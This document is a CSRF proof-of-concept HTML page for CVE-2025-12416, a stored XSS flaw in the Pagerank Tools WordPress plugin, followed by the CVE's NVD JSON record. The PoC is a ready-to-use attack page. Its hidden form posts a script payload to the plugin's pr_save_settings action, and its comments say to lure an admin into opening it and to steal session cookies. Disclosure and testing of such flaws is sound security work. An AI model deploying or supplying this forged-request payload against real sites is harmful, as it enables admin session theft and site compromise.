CVE-2025-12416

<!-- CSRF PoC for CVE-2025-12416: Stored XSS in Pagerank Tools WordPress Plugin --> <!-- Save this as poc.html and trick admin into opening it --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-12416</title> </head> <body> <h2>CSRF PoC for CVE-2025-12416</h2> <p>Click the button below to trigger the vulnerability:</p> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="exploitForm"> <!-- WordPress requires these fields --> <input type="hidden" name="action" value="pr_save_settings"> <!-- XSS payload injected via setting parameter --> <input type="hidden" name="pr_google_pagerank" value='"><script>alert(String.fromCharCode(88,83,83,32,80,111,67,32,69,120,101,99,117,116,101,100))</script><x y="'>'> <input type="hidden" name="pr_submit" value="Save Changes"> </form> <button onclick="document.getElementById('exploitForm').submit()">Click me</button> <script> // Auto-submit for demonstration // document.getElementById('exploitForm').submit(); console.log('PoC loaded. Click the button to exploit.'); </script> </body> </html> <!-- Attack Scenario: 1. Attacker creates malicious page with forged request 2. Lures authenticated WordPress admin to visit page 3. Admin clicks button or page auto-submits form 4. XSS payload saved to plugin settings via pr_save_settings() 5. When admin visits plugin settings page, XSS executes 6. Attacker can steal session cookies, perform actions as admin -->

{"cve": {"id": "CVE-2025-12416", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:13.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pagerank Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the pr_save_settings() function and insufficient input sanitization. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The injected scripts will execute whenever a user accesses the plugin's settings page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/pagerank-tools/tags/1.1.5/functions.inc.php#L176", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/pagerank-tools/tags/1.1.5/functions.inc.php#L192", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/177900d6-c52e-4ac4-a74d-412e453f9d05?source=cve", "source": "[email protected]"}]}}